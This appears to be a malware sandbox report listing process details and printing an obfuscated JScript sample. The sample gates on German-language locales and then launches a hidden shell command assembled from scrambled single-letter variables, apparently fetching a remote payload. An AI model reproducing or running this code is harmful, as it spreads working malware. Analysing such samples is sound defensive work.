File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 20:36:21 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7403e0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 20:36:21 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function zttzheqov() { |
|
1 | slqisj = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var cnqpv = this[xjpkene + sudhap + bocpk + rjyfs + kajvof + jowpjb + pzuxg + mnrewvvw] ( this[odntetz + czflbo + yfqesd + bocpk + hiahhd + xjpkene + mnrewvvw][qzsatdlpq + bocpk + kajvof + sudhap + mnrewvvw + kajvof + owsfhu + zdaduzaf + loyde + kajvof + yfqesd + mnrewvvw] ( odntetz + czflbo + yfqesd + bocpk + hiahhd + xjpkene + mnrewvvw + swxsymme + czflbo + xqvsj + kajvof + jopwbwok + jopwbwok ) [lfpfsemp + kajvof + ylhavnv + lfpfsemp + kajvof + sudhap + xobotmzf] ( fnxnoen + tqlcrqr + uinig + fhpmjwocu + qdkwym + qzsatdlpq + pkjojy + lfpfsemp + lfpfsemp + uinig + gqccx + wvpjbqq + qdkwym + pkjojy + czflbo + uinig + lfpfsemp + znzngdifv + qzsatdlpq + zrnje + pzuxg + mnrewvvw + bocpk + zrnje + jopwbwok + wszcrynrz + aimfopbnm + sudhap + pzuxg + kajvof + jopwbwok + znzngdifv + jowpjb + pzuxg + mnrewvvw + kajvof + bocpk + pzuxg + sudhap + mnrewvvw + hiahhd + zrnje + pzuxg + sudhap + jopwbwok + znzngdifv + cwcvnevcm + zrnje + yfqesd + sudhap + jopwbwok + kajvof ), 16 ); |
|
3 | for ( egcyrcev = 0 ; egcyrcev < slqisj[jopwbwok + kajvof + pzuxg + ylhavnv + mnrewvvw + xqvsj] ; ++ egcyrcev ) | |
4 | { | |
5 | if ( cnqpv == slqisj[egcyrcev] ) | |
6 | { | |
7 | cnqpv = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( cnqpv !== true ) | |
12 | this[odntetz + czflbo + yfqesd + bocpk + hiahhd + xjpkene + mnrewvvw][avvacjrts + zzccpqkbh + hiahhd + mnrewvvw] ( ); | |
13 | this[odntetz + czflbo + yfqesd + bocpk + hiahhd + xjpkene + mnrewvvw][qzsatdlpq + bocpk + kajvof + sudhap + mnrewvvw + kajvof + owsfhu + zdaduzaf + loyde + kajvof + yfqesd + mnrewvvw] ( odntetz + czflbo + yfqesd + bocpk + hiahhd + xjpkene + mnrewvvw + swxsymme + czflbo + xqvsj + kajvof + jopwbwok + jopwbwok ) [bocpk + zzccpqkbh + pzuxg] ( yfqesd + jnkmzys + xobotmzf + wszcrynrz + wxvsbazr + yfqesd + wszcrynrz + xjpkene + zrnje + lbhgtfkr + kajvof + bocpk + rjyfs + xqvsj + kajvof + jopwbwok + jopwbwok + swxsymme + kajvof + gmwena + kajvof + wszcrynrz + wygxxo + qzsatdlpq + zrnje + jnkmzys + jnkmzys + sudhap + pzuxg + xobotmzf + wszcrynrz + rgbwkpfpk + jowpjb + pzuxg + dskjvrkjj + zrnje + yvqeh + kajvof + wygxxo + odntetz + kajvof + zdaduzaf + lfpfsemp + kajvof + haysp + zzccpqkbh + kajvof + rjyfs + mnrewvvw + wszcrynrz + wygxxo + owsfhu + zzccpqkbh + mnrewvvw + vmhnbzyr + hiahhd + jopwbwok + kajvof + wszcrynrz + uzglrknh + mnrewvvw + kajvof + jnkmzys + xjpkene + uzglrknh + znzngdifv + hiahhd + pzuxg + dskjvrkjj + zrnje + hiahhd + yfqesd + kajvof + swxsymme + xjpkene + xobotmzf + rsehargus + wszcrynrz + xqvsj + mnrewvvw + mnrewvvw + xjpkene + heegrex + wxvsbazr + wxvsbazr + odumbjkie + xohdkhdci + hueuwebgo + swxsymme + odumbjkie + ikwapjmn + hueuwebgo + swxsymme + odumbjkie + swxsymme + qbpjik + iaudyqt + bxmvog + wxvsbazr + hiahhd + pzuxg + dskjvrkjj + zrnje + hiahhd + yfqesd + kajvof + swxsymme + xjpkene + xqvsj + xjpkene + rgbwkpfpk + uwsdwnuar + uwsdwnuar + rjyfs + mnrewvvw + sudhap + bocpk + mnrewvvw + wszcrynrz + uzglrknh + mnrewvvw + kajvof + jnkmzys + xjpkene + uzglrknh + znzngdifv + hiahhd + pzuxg + dskjvrkjj + zrnje + hiahhd + yfqesd + kajvof + swxsymme + xjpkene + xobotmzf + rsehargus + uwsdwnuar + uwsdwnuar + yfqesd + jnkmzys + xobotmzf + wszcrynrz + wxvsbazr + yfqesd + wszcrynrz + pzuxg + kajvof + mnrewvvw + wszcrynrz + zzccpqkbh + rjyfs + kajvof + wszcrynrz + znzngdifv + znzngdifv + odumbjkie + xohdkhdci + hueuwebgo + swxsymme + odumbjkie + ikwapjmn + hueuwebgo + swxsymme + odumbjkie + swxsymme + qbpjik + iaudyqt + bxmvog + uvnppli + agtot + agtot + agtot + agtot + znzngdifv + xobotmzf + sudhap + dskjvrkjj + lbhgtfkr + lbhgtfkr + lbhgtfkr + bocpk + zrnje + zrnje + mnrewvvw + znzngdifv + uwsdwnuar + uwsdwnuar + yfqesd + jnkmzys + xobotmzf + wszcrynrz + wxvsbazr + yfqesd + wszcrynrz + bocpk + kajvof + ylhavnv + rjyfs + dskjvrkjj + bocpk + hueuwebgo + qbpjik + wszcrynrz + wxvsbazr + rjyfs + wszcrynrz + znzngdifv + znzngdifv + odumbjkie + xohdkhdci + hueuwebgo + swxsymme + odumbjkie + ikwapjmn + hueuwebgo + swxsymme + odumbjkie + swxsymme + qbpjik + iaudyqt + bxmvog + uvnppli + agtot + agtot + agtot + agtot + znzngdifv + xobotmzf + sudhap + dskjvrkjj + lbhgtfkr + lbhgtfkr + lbhgtfkr + bocpk + zrnje + zrnje + mnrewvvw + znzngdifv + qbpjik + ikwapjmn + dpiqalgbk + bxmvog + qbpjik + odumbjkie + ikwapjmn + dpiqalgbk + dpiqalgbk + odumbjkie + qbpjik + bxmvog + agtot + xohdkhdci + iwfrpllo + swxsymme + xobotmzf + jopwbwok + jopwbwok, 0, false ); |
|
14 | } | |
15 | sudhap = "R"; | |
16 | sudhap = "F"; | |
17 | sudhap = "a"; | |
18 | fhpmjwocu = "u"; | |
19 | fhpmjwocu = "Q"; | |
20 | fhpmjwocu = "r"; | |
21 | fhpmjwocu = "g"; | |
22 | fhpmjwocu = "q"; | |
23 | fhpmjwocu = "h"; | |
24 | fhpmjwocu = "j"; | |
25 | fhpmjwocu = "Q"; | |
26 | fhpmjwocu = "P"; | |
27 | fhpmjwocu = "x"; | |
28 | fhpmjwocu = "g"; | |
29 | fhpmjwocu = "A"; | |
30 | fhpmjwocu = "R"; | |
31 | fhpmjwocu = "k"; | |
32 | fhpmjwocu = "H"; | |
33 | fhpmjwocu = "E"; | |
34 | fhpmjwocu = "p"; | |
35 | fhpmjwocu = "G"; | |
36 | fhpmjwocu = "m"; | |
37 | fhpmjwocu = "i"; | |
38 | fhpmjwocu = "Y"; | |
39 | fhpmjwocu = "a"; | |
40 | fhpmjwocu = "L"; | |
41 | fhpmjwocu = "n"; | |
42 | fhpmjwocu = "T"; | |
43 | fhpmjwocu = "q"; | |
44 | fhpmjwocu = "i"; | |
45 | fhpmjwocu = "L"; | |
46 | fhpmjwocu = "b"; | |
47 | fhpmjwocu = "T"; | |
48 | fhpmjwocu = "H"; | |
49 | fhpmjwocu = "s"; | |
50 | fhpmjwocu = "J"; | |
51 | fhpmjwocu = "P"; | |
52 | fhpmjwocu = "z"; | |
53 | fhpmjwocu = "D"; | |
54 | fhpmjwocu = "I"; | |
55 | fhpmjwocu = "g"; | |
56 | fhpmjwocu = "Y"; | |
57 | zdaduzaf = "Z"; | |
58 | zdaduzaf = "P"; | |
59 | zdaduzaf = "E"; | |
60 | zdaduzaf = "e"; | |
61 | zdaduzaf = "c"; | |
62 | zdaduzaf = "b"; | |
63 | zdaduzaf = "z"; | |
64 | zdaduzaf = "A"; | |
65 | zdaduzaf = "y"; | |
66 | zdaduzaf = "Z"; | |
67 | zdaduzaf = "g"; | |
68 | zdaduzaf = "I"; | |
69 | zdaduzaf = "O"; | |
70 | zdaduzaf = "I"; | |
71 | zdaduzaf = "J"; | |
72 | zdaduzaf = "e"; | |
73 | zdaduzaf = "T"; | |
74 | zdaduzaf = "r"; | |
75 | zdaduzaf = "P"; | |
76 | zdaduzaf = "l"; | |
77 | zdaduzaf = "T"; | |
78 | zdaduzaf = "n"; | |
79 | zdaduzaf = "m"; | |
80 | zdaduzaf = "d"; | |
81 | zdaduzaf = "L"; | |
82 | zdaduzaf = "N"; | |
83 | zdaduzaf = "u"; | |
84 | zdaduzaf = "M"; | |
85 | zdaduzaf = "b"; | |
86 | zdaduzaf = "b"; | |
87 | mnrewvvw = "i"; | |
88 | mnrewvvw = "E"; | |
89 | mnrewvvw = "J"; | |
90 | mnrewvvw = "M"; | |
91 | mnrewvvw = "g"; | |
92 | mnrewvvw = "x"; | |
93 | mnrewvvw = "u"; | |
94 | mnrewvvw = "b"; | |
95 | mnrewvvw = "v"; | |
96 | mnrewvvw = "t"; | |
97 | mnrewvvw = "N"; | |
98 | mnrewvvw = "A"; | |
99 | mnrewvvw = "P"; | |
100 | mnrewvvw = "D"; | |
101 | mnrewvvw = "Z"; | |
102 | mnrewvvw = "t"; | |
103 | xohdkhdci = "Y"; | |
104 | xohdkhdci = "B"; | |
105 | xohdkhdci = "u"; | |
106 | xohdkhdci = "O"; | |
107 | xohdkhdci = "h"; | |
108 | xohdkhdci = "H"; | |
109 | xohdkhdci = "P"; | |
110 | xohdkhdci = "G"; | |
111 | xohdkhdci = "Z"; | |
112 | xohdkhdci = "U"; | |
113 | xohdkhdci = "o"; | |
114 | xohdkhdci = "t"; | |
115 | xohdkhdci = "R"; | |
116 | xohdkhdci = "z"; | |
117 | xohdkhdci = "T"; | |
118 | xohdkhdci = "j"; | |
119 | xohdkhdci = "H"; | |
120 | xohdkhdci = "J"; | |
121 | xohdkhdci = "m"; | |
122 | xohdkhdci = "z"; | |
123 | xohdkhdci = "j"; | |
124 | xohdkhdci = "A"; | |
125 | xohdkhdci = "D"; | |
126 | xohdkhdci = "o"; | |
127 | xohdkhdci = "9"; | |
128 | cwcvnevcm = "X"; | |
129 | cwcvnevcm = "M"; | |
130 | cwcvnevcm = "w"; | |
131 | cwcvnevcm = "s"; | |
132 | cwcvnevcm = "J"; | |
133 | cwcvnevcm = "L"; | |
134 | heegrex = "R"; | |
135 | heegrex = ":"; | |
136 | uinig = "v"; | |
137 | uinig = "T"; | |
138 | uinig = "M"; | |
139 | uinig = "E"; | |
140 | uinig = "m"; | |
141 | uinig = "O"; | |
142 | uinig = "a"; | |
143 | uinig = "j"; | |
144 | uinig = "A"; | |
145 | uinig = "X"; | |
146 | uinig = "a"; | |
147 | uinig = "D"; | |
148 | uinig = "S"; | |
149 | uinig = "V"; | |
150 | uinig = "R"; | |
151 | uinig = "I"; | |
152 | uinig = "S"; | |
153 | uinig = "e"; | |
154 | uinig = "K"; | |
155 | uinig = "x"; | |
156 | uinig = "m"; | |
157 | uinig = "l"; | |
158 | uinig = "E"; | |
159 | uinig = "m"; | |
160 | uinig = "L"; | |
161 | uinig = "e"; | |
162 | uinig = "a"; | |
163 | uinig = "Z"; | |
164 | uinig = "a"; | |
165 | uinig = "V"; | |
166 | uinig = "r"; | |
167 | uinig = "u"; | |
168 | uinig = "S"; | |
169 | uinig = "q"; | |
170 | uinig = "E"; | |
171 | xobotmzf = "i"; | |
172 | xobotmzf = "B"; | |
173 | xobotmzf = "k"; | |
174 | xobotmzf = "T"; | |
175 | xobotmzf = "Y"; | |
176 | xobotmzf = "M"; | |
177 | xobotmzf = "k"; | |
178 | xobotmzf = "Q"; | |
179 | xobotmzf = "P"; | |
180 | xobotmzf = "I"; | |
181 | xobotmzf = "s"; | |
182 | xobotmzf = "L"; | |
183 | xobotmzf = "e"; | |
184 | xobotmzf = "B"; | |
185 | xobotmzf = "f"; | |
186 | xobotmzf = "C"; | |
187 | xobotmzf = "b"; | |
188 | xobotmzf = "n"; | |
189 | xobotmzf = "m"; | |
190 | xobotmzf = "l"; | |
191 | xobotmzf = "I"; | |
192 | xobotmzf = "p"; | |
193 | xobotmzf = "h"; | |
194 | xobotmzf = "z"; | |
195 | xobotmzf = "Z"; | |
196 | xobotmzf = "X"; | |
197 | xobotmzf = "u"; | |
198 | xobotmzf = "y"; | |
199 | xobotmzf = "E"; | |
200 | xobotmzf = "q"; | |
201 | xobotmzf = "V"; | |
202 | xobotmzf = "v"; | |
203 | xobotmzf = "R"; | |
204 | xobotmzf = "x"; | |
205 | xobotmzf = "C"; | |
206 | xobotmzf = "p"; | |
207 | xobotmzf = "o"; | |
208 | xobotmzf = "A"; | |
209 | xobotmzf = "J"; | |
210 | xobotmzf = "B"; | |
211 | xobotmzf = "O"; | |
212 | xobotmzf = "z"; | |
213 | xobotmzf = "d"; | |
214 | zrnje = "o"; | |
215 | zrnje = "L"; | |
216 | zrnje = "y"; | |
217 | zrnje = "C"; | |
218 | zrnje = "O"; | |
219 | zrnje = "o"; | |
220 | zrnje = "Q"; | |
221 | zrnje = "f"; | |
222 | zrnje = "U"; | |
223 | zrnje = "Y"; | |
224 | zrnje = "d"; | |
225 | zrnje = "z"; | |
226 | zrnje = "H"; | |
227 | zrnje = "i"; | |
228 | zrnje = "u"; | |
229 | zrnje = "d"; | |
230 | zrnje = "f"; | |
231 | zrnje = "l"; | |
232 | zrnje = "I"; | |
233 | zrnje = "c"; | |
234 | zrnje = "c"; | |
235 | zrnje = "x"; | |
236 | zrnje = "o"; | |
237 | zrnje = "d"; | |
238 | zrnje = "N"; | |
239 | zrnje = "b"; | |
240 | zrnje = "v"; | |
241 | zrnje = "c"; | |
242 | zrnje = "J"; | |
243 | zrnje = "m"; | |
244 | zrnje = "o"; | |
245 | kajvof = "E"; | |
246 | kajvof = "Y"; | |
247 | kajvof = "K"; | |
248 | kajvof = "i"; | |
249 | kajvof = "K"; | |
250 | kajvof = "C"; | |
251 | kajvof = "T"; | |
252 | kajvof = "H"; | |
253 | kajvof = "z"; | |
254 | kajvof = "w"; | |
255 | kajvof = "k"; | |
256 | kajvof = "i"; | |
257 | kajvof = "n"; | |
258 | kajvof = "O"; | |
259 | kajvof = "V"; | |
260 | kajvof = "x"; | |
261 | kajvof = "d"; | |
262 | kajvof = "D"; | |
263 | kajvof = "C"; | |
264 | kajvof = "a"; | |
265 | kajvof = "T"; | |
266 | kajvof = "Z"; | |
267 | kajvof = "y"; | |
268 | kajvof = "R"; | |
269 | kajvof = "I"; | |
270 | kajvof = "n"; | |
271 | kajvof = "E"; | |
272 | kajvof = "a"; | |
273 | kajvof = "W"; | |
274 | kajvof = "S"; | |
275 | kajvof = "S"; | |
276 | kajvof = "E"; | |
277 | kajvof = "x"; | |
278 | kajvof = "C"; | |
279 | kajvof = "W"; | |
280 | kajvof = "R"; | |
281 | kajvof = "h"; | |
282 | kajvof = "B"; | |
283 | kajvof = "M"; | |
284 | kajvof = "e"; | |
285 | yfqesd = "t"; | |
286 | yfqesd = "j"; | |
287 | yfqesd = "s"; | |
288 | yfqesd = "G"; | |
289 | yfqesd = "G"; | |
290 | yfqesd = "X"; | |
291 | yfqesd = "V"; | |
292 | yfqesd = "Y"; | |
293 | yfqesd = "X"; | |
294 | yfqesd = "M"; | |
295 | yfqesd = "G"; | |
296 | yfqesd = "J"; | |
297 | yfqesd = "c"; | |
298 | uzglrknh = "e"; | |
299 | uzglrknh = "e"; | |
300 | uzglrknh = "n"; | |
301 | uzglrknh = "p"; | |
302 | uzglrknh = "%"; | |
303 | tqlcrqr = "i"; | |
304 | tqlcrqr = "K"; | |
305 | tqlcrqr = "v"; | |
306 | tqlcrqr = "j"; | |
307 | tqlcrqr = "Q"; | |
308 | tqlcrqr = "L"; | |
309 | tqlcrqr = "U"; | |
310 | tqlcrqr = "v"; | |
311 | tqlcrqr = "s"; | |
312 | tqlcrqr = "z"; | |
313 | tqlcrqr = "f"; | |
314 | tqlcrqr = "B"; | |
315 | tqlcrqr = "Y"; | |
316 | tqlcrqr = "w"; | |
317 | tqlcrqr = "H"; | |
318 | tqlcrqr = "o"; | |
319 | tqlcrqr = "A"; | |
320 | tqlcrqr = "B"; | |
321 | tqlcrqr = "z"; | |
322 | tqlcrqr = "s"; | |
323 | tqlcrqr = "j"; | |
324 | tqlcrqr = "p"; | |
325 | tqlcrqr = "d"; | |
326 | tqlcrqr = "w"; | |
327 | tqlcrqr = "o"; | |
328 | tqlcrqr = "M"; | |
329 | tqlcrqr = "j"; | |
330 | tqlcrqr = "I"; | |
331 | tqlcrqr = "K"; | |
332 | iaudyqt = "O"; | |
333 | iaudyqt = "l"; | |
334 | iaudyqt = "d"; | |
335 | iaudyqt = "s"; | |
336 | iaudyqt = "c"; | |
337 | iaudyqt = "E"; | |
338 | iaudyqt = "M"; | |
339 | iaudyqt = "s"; | |
340 | iaudyqt = "C"; | |
341 | iaudyqt = "V"; | |
342 | iaudyqt = "h"; | |
343 | iaudyqt = "J"; | |
344 | iaudyqt = "y"; | |
345 | iaudyqt = "q"; | |
346 | iaudyqt = "G"; | |
347 | iaudyqt = "P"; | |
348 | iaudyqt = "X"; | |
349 | iaudyqt = "Y"; | |
350 | iaudyqt = "u"; | |
351 | iaudyqt = "e"; | |
352 | iaudyqt = "A"; | |
353 | iaudyqt = "J"; | |
354 | iaudyqt = "y"; | |
355 | iaudyqt = "F"; | |
356 | iaudyqt = "r"; | |
357 | iaudyqt = "g"; | |
358 | iaudyqt = "q"; | |
359 | iaudyqt = "R"; | |
360 | iaudyqt = "X"; | |
361 | iaudyqt = "o"; | |
362 | iaudyqt = "l"; | |
363 | iaudyqt = "o"; | |
364 | iaudyqt = "n"; | |
365 | iaudyqt = "h"; | |
366 | iaudyqt = "o"; | |
367 | iaudyqt = "p"; | |
368 | iaudyqt = "L"; | |
369 | iaudyqt = "I"; | |
370 | iaudyqt = "H"; | |
371 | iaudyqt = "0"; | |
372 | rjyfs = "B"; | |
373 | rjyfs = "W"; | |
374 | rjyfs = "P"; | |
375 | rjyfs = "N"; | |
376 | rjyfs = "s"; | |
377 | wygxxo = "T"; | |
378 | wygxxo = "B"; | |
379 | wygxxo = "t"; | |
380 | wygxxo = "l"; | |
381 | wygxxo = "O"; | |
382 | wygxxo = "n"; | |
383 | wygxxo = "Z"; | |
384 | wygxxo = "H"; | |
385 | wygxxo = "q"; | |
386 | wygxxo = "a"; | |
387 | wygxxo = "R"; | |
388 | wygxxo = "d"; | |
389 | wygxxo = "l"; | |
390 | wygxxo = "y"; | |
391 | wygxxo = "U"; | |
392 | wygxxo = "y"; | |
393 | wygxxo = "k"; | |
394 | wygxxo = "V"; | |
395 | wygxxo = "b"; | |
396 | wygxxo = "I"; | |
397 | wygxxo = "v"; | |
398 | wygxxo = "b"; | |
399 | wygxxo = "g"; | |
400 | wygxxo = "C"; | |
401 | wygxxo = "H"; | |
402 | wygxxo = "M"; | |
403 | wygxxo = "r"; | |
404 | wygxxo = "-"; | |
405 | agtot = "R"; | |
406 | agtot = "K"; | |
407 | agtot = "8"; | |
408 | uvnppli = "T"; | |
409 | uvnppli = "s"; | |
410 | uvnppli = "b"; | |
411 | uvnppli = "g"; | |
412 | uvnppli = "c"; | |
413 | uvnppli = "e"; | |
414 | uvnppli = "J"; | |
415 | uvnppli = "F"; | |
416 | uvnppli = "Z"; | |
417 | uvnppli = "s"; | |
418 | uvnppli = "@"; | |
419 | rsehargus = "h"; | |
420 | rsehargus = "N"; | |
421 | rsehargus = "B"; | |
422 | rsehargus = "X"; | |
423 | rsehargus = "c"; | |
424 | rsehargus = "D"; | |
425 | rsehargus = "V"; | |
426 | rsehargus = "V"; | |
427 | rsehargus = "O"; | |
428 | rsehargus = "h"; | |
429 | rsehargus = "r"; | |
430 | rsehargus = "b"; | |
431 | rsehargus = "u"; | |
432 | rsehargus = "H"; | |
433 | rsehargus = "V"; | |
434 | rsehargus = "Q"; | |
435 | rsehargus = "o"; | |
436 | rsehargus = "t"; | |
437 | rsehargus = "x"; | |
438 | rsehargus = "X"; | |
439 | rsehargus = "A"; | |
440 | rsehargus = "W"; | |
441 | rsehargus = "y"; | |
442 | rsehargus = "e"; | |
443 | rsehargus = "J"; | |
444 | rsehargus = "l"; | |
445 | rsehargus = "f"; | |
446 | dskjvrkjj = "p"; | |
447 | dskjvrkjj = "C"; | |
448 | dskjvrkjj = "e"; | |
449 | dskjvrkjj = "J"; | |
450 | dskjvrkjj = "A"; | |
451 | dskjvrkjj = "D"; | |
452 | dskjvrkjj = "R"; | |
453 | dskjvrkjj = "v"; | |
454 | dskjvrkjj = "t"; | |
455 | dskjvrkjj = "w"; | |
456 | dskjvrkjj = "v"; | |
457 | yvqeh = "l"; | |
458 | yvqeh = "r"; | |
459 | yvqeh = "X"; | |
460 | yvqeh = "R"; | |
461 | yvqeh = "U"; | |
462 | yvqeh = "r"; | |
463 | yvqeh = "d"; | |
464 | yvqeh = "E"; | |
465 | yvqeh = "i"; | |
466 | yvqeh = "E"; | |
467 | yvqeh = "j"; | |
468 | yvqeh = "w"; | |
469 | yvqeh = "r"; | |
470 | yvqeh = "E"; | |
471 | yvqeh = "u"; | |
472 | yvqeh = "m"; | |
473 | yvqeh = "k"; | |
474 | loyde = "D"; | |
475 | loyde = "d"; | |
476 | loyde = "B"; | |
477 | loyde = "H"; | |
478 | loyde = "S"; | |
479 | loyde = "h"; | |
480 | loyde = "B"; | |
481 | loyde = "Q"; | |
482 | loyde = "C"; | |
483 | loyde = "K"; | |
484 | loyde = "m"; | |
485 | loyde = "L"; | |
486 | loyde = "t"; | |
487 | loyde = "u"; | |
488 | loyde = "D"; | |
489 | loyde = "x"; | |
490 | loyde = "D"; | |
491 | loyde = "c"; | |
492 | loyde = "u"; | |
493 | loyde = "v"; | |
494 | loyde = "s"; | |
495 | loyde = "x"; | |
496 | loyde = "a"; | |
497 | loyde = "w"; | |
498 | loyde = "y"; | |
499 | loyde = "k"; | |
500 | loyde = "e"; | |
501 | loyde = "n"; | |
502 | loyde = "A"; | |
503 | loyde = "l"; | |
504 | loyde = "h"; | |
505 | loyde = "w"; | |
506 | loyde = "v"; | |
507 | loyde = "w"; | |
508 | loyde = "l"; | |
509 | loyde = "Q"; | |
510 | loyde = "w"; | |
511 | loyde = "Z"; | |
512 | loyde = "X"; | |
513 | loyde = "w"; | |
514 | loyde = "J"; | |
515 | loyde = "j"; | |
516 | odntetz = "U"; | |
517 | odntetz = "G"; | |
518 | odntetz = "s"; | |
519 | odntetz = "H"; | |
520 | odntetz = "F"; | |
521 | odntetz = "B"; | |
522 | odntetz = "W"; | |
523 | odntetz = "D"; | |
524 | odntetz = "W"; | |
525 | odntetz = "g"; | |
526 | odntetz = "c"; | |
527 | odntetz = "Q"; | |
528 | odntetz = "l"; | |
529 | odntetz = "b"; | |
530 | odntetz = "J"; | |
531 | odntetz = "E"; | |
532 | odntetz = "i"; | |
533 | odntetz = "m"; | |
534 | odntetz = "L"; | |
535 | odntetz = "q"; | |
536 | odntetz = "t"; | |
537 | odntetz = "W"; | |
538 | iwfrpllo = "A"; | |
539 | iwfrpllo = "v"; | |
540 | iwfrpllo = "M"; | |
541 | iwfrpllo = "C"; | |
542 | iwfrpllo = "Z"; | |
543 | iwfrpllo = "e"; | |
544 | iwfrpllo = "j"; | |
545 | iwfrpllo = "h"; | |
546 | iwfrpllo = "B"; | |
547 | iwfrpllo = "r"; | |
548 | iwfrpllo = "S"; | |
549 | iwfrpllo = "N"; | |
550 | iwfrpllo = "Z"; | |
551 | iwfrpllo = "X"; | |
552 | iwfrpllo = "v"; | |
553 | iwfrpllo = "B"; | |
554 | iwfrpllo = "U"; | |
555 | iwfrpllo = "L"; | |
556 | iwfrpllo = "i"; | |
557 | iwfrpllo = "A"; | |
558 | iwfrpllo = "E"; | |
559 | iwfrpllo = "h"; | |
560 | iwfrpllo = "d"; | |
561 | iwfrpllo = "I"; | |
562 | iwfrpllo = "G"; | |
563 | iwfrpllo = "Q"; | |
564 | iwfrpllo = "V"; | |
565 | iwfrpllo = "P"; | |
566 | iwfrpllo = "d"; | |
567 | iwfrpllo = "h"; | |
568 | iwfrpllo = "s"; | |
569 | iwfrpllo = "7"; | |
570 | dpiqalgbk = "v"; | |
571 | dpiqalgbk = "B"; | |
572 | dpiqalgbk = "d"; | |
573 | dpiqalgbk = "w"; | |
574 | dpiqalgbk = "E"; | |
575 | dpiqalgbk = "g"; | |
576 | dpiqalgbk = "w"; | |
577 | dpiqalgbk = "M"; | |
578 | dpiqalgbk = "T"; | |
579 | dpiqalgbk = "j"; | |
580 | dpiqalgbk = "P"; | |
581 | dpiqalgbk = "b"; | |
582 | dpiqalgbk = "A"; | |
583 | dpiqalgbk = "X"; | |
584 | dpiqalgbk = "A"; | |
585 | dpiqalgbk = "f"; | |
586 | dpiqalgbk = "e"; | |
587 | dpiqalgbk = "i"; | |
588 | dpiqalgbk = "U"; | |
589 | dpiqalgbk = "d"; | |
590 | dpiqalgbk = "W"; | |
591 | dpiqalgbk = "W"; | |
592 | dpiqalgbk = "F"; | |
593 | dpiqalgbk = "B"; | |
594 | dpiqalgbk = "z"; | |
595 | dpiqalgbk = "M"; | |
596 | dpiqalgbk = "k"; | |
597 | dpiqalgbk = "y"; | |
598 | dpiqalgbk = "u"; | |
599 | dpiqalgbk = "a"; | |
600 | dpiqalgbk = "z"; | |
601 | dpiqalgbk = "l"; | |
602 | dpiqalgbk = "o"; | |
603 | dpiqalgbk = "i"; | |
604 | dpiqalgbk = "i"; | |
605 | dpiqalgbk = "K"; | |
606 | dpiqalgbk = "P"; | |
607 | dpiqalgbk = "Y"; | |
608 | dpiqalgbk = "h"; | |
609 | dpiqalgbk = "l"; | |
610 | dpiqalgbk = "6"; | |
611 | haysp = "X"; | |
612 | haysp = "H"; | |
613 | haysp = "w"; | |
614 | haysp = "b"; | |
615 | haysp = "f"; | |
616 | haysp = "r"; | |
617 | haysp = "g"; | |
618 | haysp = "Y"; | |
619 | haysp = "M"; | |
620 | haysp = "P"; | |
621 | haysp = "t"; | |
622 | haysp = "e"; | |
623 | haysp = "r"; | |
624 | haysp = "B"; | |
625 | haysp = "H"; | |
626 | haysp = "N"; | |
627 | haysp = "q"; | |
628 | uwsdwnuar = "w"; | |
629 | uwsdwnuar = "b"; | |
630 | uwsdwnuar = "U"; | |
631 | uwsdwnuar = "x"; | |
632 | uwsdwnuar = "M"; | |
633 | uwsdwnuar = "s"; | |
634 | uwsdwnuar = "n"; | |
635 | uwsdwnuar = "C"; | |
636 | uwsdwnuar = "w"; | |
637 | uwsdwnuar = "f"; | |
638 | uwsdwnuar = "b"; | |
639 | uwsdwnuar = "F"; | |
640 | uwsdwnuar = "g"; | |
641 | uwsdwnuar = "f"; | |
642 | uwsdwnuar = "q"; | |
643 | uwsdwnuar = "H"; | |
644 | uwsdwnuar = "G"; | |
645 | uwsdwnuar = "j"; | |
646 | uwsdwnuar = "V"; | |
647 | uwsdwnuar = "D"; | |
648 | uwsdwnuar = "v"; | |
649 | uwsdwnuar = "Q"; | |
650 | uwsdwnuar = "N"; | |
651 | uwsdwnuar = "K"; | |
652 | uwsdwnuar = "w"; | |
653 | uwsdwnuar = "O"; | |
654 | uwsdwnuar = "I"; | |
655 | uwsdwnuar = "B"; | |
656 | uwsdwnuar = "V"; | |
657 | uwsdwnuar = "g"; | |
658 | uwsdwnuar = "L"; | |
659 | uwsdwnuar = "e"; | |
660 | uwsdwnuar = "z"; | |
661 | uwsdwnuar = "&"; | |
662 | zzccpqkbh = "U"; | |
663 | zzccpqkbh = "t"; | |
664 | zzccpqkbh = "i"; | |
665 | zzccpqkbh = "k"; | |
666 | zzccpqkbh = "l"; | |
667 | zzccpqkbh = "u"; | |
668 | zzccpqkbh = "o"; | |
669 | zzccpqkbh = "j"; | |
670 | zzccpqkbh = "k"; | |
671 | zzccpqkbh = "R"; | |
672 | zzccpqkbh = "H"; | |
673 | zzccpqkbh = "k"; | |
674 | zzccpqkbh = "f"; | |
675 | zzccpqkbh = "M"; | |
676 | zzccpqkbh = "w"; | |
677 | zzccpqkbh = "R"; | |
678 | zzccpqkbh = "j"; | |
679 | zzccpqkbh = "r"; | |
680 | zzccpqkbh = "e"; | |
681 | zzccpqkbh = "K"; | |
682 | zzccpqkbh = "C"; | |
683 | zzccpqkbh = "V"; | |
684 | zzccpqkbh = "u"; | |
685 | zzccpqkbh = "D"; | |
686 | zzccpqkbh = "b"; | |
687 | zzccpqkbh = "L"; | |
688 | zzccpqkbh = "v"; | |
689 | zzccpqkbh = "f"; | |
690 | zzccpqkbh = "u"; | |
691 | lbhgtfkr = "P"; | |
692 | lbhgtfkr = "Y"; | |
